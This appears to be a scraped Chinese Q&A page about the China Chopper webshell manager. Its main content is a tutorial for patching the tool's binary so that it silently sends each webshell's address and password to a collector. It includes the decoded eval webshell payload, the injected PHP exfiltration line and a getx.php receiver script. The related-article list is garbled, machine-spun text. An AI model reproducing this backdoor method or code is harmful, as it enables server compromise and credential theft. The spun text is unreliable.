当前位置:首页 > 情感技巧 > 正文内容

黑客中国莱刀(菜刀 黑客)

hacker2年前 (2022-07-25)情感技巧82

本文目录一览:

为什么我的中国菜刀链接我自己的服务器,无法执行cmd显示执行命令失败,对方启动安全模式

您好,电脑基础专业芝麻团队奶沫为您解答!(望采纳,谢谢)

中国菜刀是黑客用的吧?

中国黑客界的东南西北中都是有谁?

这个不知道,桂林老兵,冰狐浪子,葛军,NEW4等等,至于是不是你说的东南西北中,你查一下他们的位置就知道了,我估计桂林老兵大概是西吧,他最新的作品:中国菜刀,相当强悍

黑客菜刀是什么意思

从软件名字上来讲有这个软件属于黑客工具,用于管理拿下的webshell批量管理。

如果是菜刀的话可以在社工的时候拿菜刀威胁恐吓对方也属于忽悠的一种,也是属于黑客

很高兴为逗逼解答。如果你满意的话麻烦采纳!

如何给中国菜刀添加隐蔽后门

1、后门如何触发

这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。

当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图

当我们执行右键-编辑文件时,我们的后门就会被触发(我们要添加的就是这样的一个隐藏后门)。

2、菜刀脱壳

在分析菜刀前,先把菜刀的壳脱掉,使用Peid可知,菜刀是UPx壳,网上找个Upx的脱壳工具即可脱壳。

3、查看数据包,分析流程(右键-编辑)

本地搭建好环境后,在菜刀中右键-编辑查看某一文件,使用burpsuite进行抓包,

数据如下

a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3Bz0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3Dz1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D

一共有3个参数,

a url解码后为@eval (base64_decode($_POST[z0]));

z0先url解码,在base64解码为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|-");die();

Z1先url解码,在base64解码为

C:\\wamp\\www\\robots.txt

稍微熟悉php的人应该能看出来,这段代码就是一个读文件的php脚本,由菜刀发送到目标服务器上,然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

如果我们将上这段代码作为字符串,发送到服务端执行,我们就能获得webshell的地址和密码。

4、使用OD分析

使用OD打开中国菜刀,右键搜索字符串,结果如下:

定位到php读取文的字符串处,点击进去到代码处

可知,程序时将其作为字符串,压入栈中作为参数被后续函数处理的,如果在这段字符串后加入我们的后门代码,就会被程序一块发送到服务端执行。

5、修改菜刀程序文件

由上可知,字符串的地址为0x49ba94,查看内存数据,

发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。

这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。

将后门字符串

$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

放到文件841d0处

打开010editor 将上述字符串复制到010editor中,

由于程序中的字符串是双字节存放的,这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换

使用010editor打开菜刀程序,跳到841d0h偏移处,将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度,

保存文件,这样后门字符串就被我们添加到程序中了。

6、使用OD修改程序代码

用OD打开菜刀程序,定位到第4步中字符串入栈的代码处 push 0049bae4。

0049bae4地址是修改前字符串的位置,现在我们将其改成我们添加的字符串的地质处,字符串文件偏移为841d0h,转化内存偏移为4841d0h,代码修改如下

保存修改的文件即可。

7、测试修改结果

修改文件后,我们在看看菜刀-右键编辑,抓到数据包

Z0解密后为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|-");die();

可见我们的后门代码也一起被发送到服务端执行了。

编写加单的getx.php接收结果,

getx.php:

?php

$getx = $_GET["caidao"];

$file = fopen("getx.txt","a+");

fwrite($file,$getx);

fwrite($file,"\r\n");

fclose($file);

?

结果如下:

8、后记

通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到后门的;OD中右键查看后门地址也是不能直接看到的。

使用中国菜刀怎么运行服务端的代码

服务端只需要简单的一行代码.这绝对可以排入叉叉最喜欢的十大软件排行榜。(Ps:在某些黑阔手中菜刀算得上是居家旅行,杀人越货的必备神器),究竟

黑客常用哪些工具

使用工具的一直都是脚本工具,还有楼下说的那些已经过期了,什么鬼讲的。。。醉了。

我怕中国红客的万鹰控制不住的想去找你谈论下什么叫黑客工具:

常见的:啊D,明小子,sqlmap,3389,菜刀,webshell马儿,等等!

扫描二维码推送至手机访问。

版权声明:本文由万物知识分享发布,如需转载请注明出处。

本文链接:http://qmsspa.com/77009.html

分享给朋友:

“黑客中国莱刀(菜刀 黑客)” 的相关文章

如何判断网站是否被降权(怎么判断网站因为什么降权)

现在 ,跟着 互联网的快捷成长 ,很多 企业为了顺应 时期 的成长 ,都邑 抉择正在互联网上扶植 本身 的网站。 然则 搜刮 引擎的规矩 常常 被修正 ,只有有一点点没有相符 规矩 ,便会招致网站升级。许多 新脚站少以至没有 晓得网站被升级了。 昨天智星便去战年夜 野聊聊若何 断定 咱们的...

哔哩哔哩专栏昨天排行榜(哔哩哔哩专栏不显示)

周围 年博栏《一面一面》,如下内容由宋九暂从一面一面官网编纂 。  二0 一 七年 八月 三日,Billi Billi栏纲上线。咱们脆疑,纵然 正在新时期 ,文字依旧有着奇特 的力气 。四年后,那颗种子将正在每一一名栏纲用户的庇护 高 逐步着花 成果 。  一 七万良好 创做者参加 咱们...

网站关键词优化注意事项(网站关键词优化怎么操作)

网站关键词优化注意事项(网站关键词优化怎么操作)

说到网站劣化,症结 词老是 弗成 或者缺的。做为SEO劣化的焦点 ,SEO劣化事情 离没有谢症结 词,不只是症结 词网站的内容战链交构造 ,也是SEO劣化必弗成 长的事情 。那些皆是网站劣化的底子 。假如 那一步出有展设孬,您会间接掉 来很年夜 一部门 接通空间。 昨天,肖佳将给年夜 野带去一...

全网营销需要具备哪些东西(做全网营销要考虑什么问题)

齐网营销能作甚么?要花若干 钱? 第一,收费营销战略  一. 请求本身 注册一个微旌旗灯号 ,然后加添 一0个微疑谈天 群,然后接洽 外面揭告白 的人换群,然背工 动加添外面的群友,一路 持续 更新微疑群!然后把您的告白 案牍 领到那个微疑石友 战微疑谈天 群!  二.您 请求注册多...

百度关键词优化的方法(提升网站关键词排名方法)

百度关键词优化的方法(提升网站关键词排名方法)

摸索 文章被baidu入进的几个根本 前提 ,一个网站出有孬的文章内容是无奈得到 孬的排名的。常常 正在服装论坛t.vhao.net上看见 一点儿SEO博野埋怨 尔网站宣布 的症结 词劣化文章为何没有被baidu支录,为何词条被撤消 ?只要这些阅历 过往没有录进文章到宣布 文章baidu秒的站少,...

当一个人很有钱的时候会怎样(不要认为一个人很有钱就会好)

有同伙 找尔谈天 ,他说,明确 ,尔本身 也正在演习 写做,但写了几地,便领现出话题否写了。您为啥否以天天 有话题写,借写的没有错。 其真尔从前 也常常 忧? ,某一地文章写完了,但亮地写啥,尔借没有 晓得。影像条记 面翻了半地,皆出找到折适的话题。 倒没有是出有话题否选,而是面临 一个话题,出有...

评论列表

蓝殇卿绡
2年前 (2022-07-25)

后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。将后门字符串$F

世味痞唇
2年前 (2022-07-25)

作品:中国菜刀,相当强悍黑客菜刀是什么意思从软件名字上来讲有这个软件属于黑客工具,用于管理拿下的webshell批量管理。如果是菜刀的话可以在社工的时候拿菜刀威胁恐吓对方也属于忽悠的一种,也是属于黑客很高兴为逗逼解答。如果你满意的话麻烦采纳!如何给中国菜刀添加隐蔽后门1、后门如何触发这里要先讲

颜于闻枯
2年前 (2022-07-25)

老兵大概是西吧,他最新的作品:中国菜刀,相当强悍黑客菜刀是什么意思从软件名字上来讲有这个软件属于黑客工具,用于管理拿下的webshell批量管理。如果是菜刀的话可以在社工的时候拿菜刀威胁恐吓对方也属于忽悠的一种,也是属于黑客很高兴为逗逼解答。如果你满意的话麻烦采纳!如何给中国菜刀添

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。